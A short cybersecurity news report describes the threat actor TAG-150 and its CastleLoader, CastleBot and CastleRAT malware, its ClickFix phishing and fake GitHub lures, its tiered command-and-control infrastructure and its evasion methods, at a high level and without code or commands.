TAG-150 Hackers Deploying Self-Developed Malware Families to Attack Organizations

Cybersecurity

A newly identified threat actor, designated TAG-150, has emerged as a significant cybersecurity concern, demonstrating advanced capabilities in deploying multiple self-developed malware families since March 2025.

TAG-150 has successfully developed and deployed malware including CastleLoader, CastleBot, and a previously undocumented remote access trojan, CastleRAT, representing an evolution in their operational capabilities.

Infection Techniques

The group primarily initiates infections through Cloudflare-themed “ClickFix” phishing attacks and fraudulent GitHub repositories. This approach deceives victims into executing malicious PowerShell commands, bypassing traditional security measures.

The campaign has achieved a 28.7% infection rate among those interacting with malicious links, indicating effective social engineering tactics.

Infrastructure and Operations

Analysts identified an extensive multi-tiered infrastructure supporting TAG-150’s operations, featuring a sophisticated command-and-control architecture across four distinct tiers:

• Tier 1: Victim-facing servers hosting various malware families.
• Tier 2: Intermediate servers accessed via RDP.
• Tier 3 and Tier 4: Used for operational management and backup.

This infrastructure design suggests advanced operational security and redundancy planning.

Malware Ecosystem

TAG-150’s malware ecosystem serves as an initial infection vector for delivering secondary payloads, including SectopRAT, WarmCookie, HijackLoader, NetSupport RAT, and various information stealers such as Stealc, RedLine Stealer, and Rhadamanthys Stealer.

This diverse payload delivery capability indicates a Malware-as-a-Service operation or partnerships with other cybercriminal groups.

Advanced Persistence and Evasion Mechanisms

CastleRAT is the most technically advanced component of TAG-150’s arsenal, available in both Python and C variants. It employs a custom binary protocol with RC4 encryption for secure communications.

Both variants utilize the geolocation API ip-api.com for location information, enabling targeted operations. The C variant includes keylogging, screen capturing, clipboard monitoring, and sophisticated process injection techniques.

Recent developments include C2 deaddrops hosted on Steam Community pages, leveraging legitimate platforms to evade detection. Persistence is maintained through registry modifications, while the Python variant uses self-deletion techniques.

These evasion methods, along with anti-detection services, demonstrate TAG-150’s commitment to operational longevity and stealth.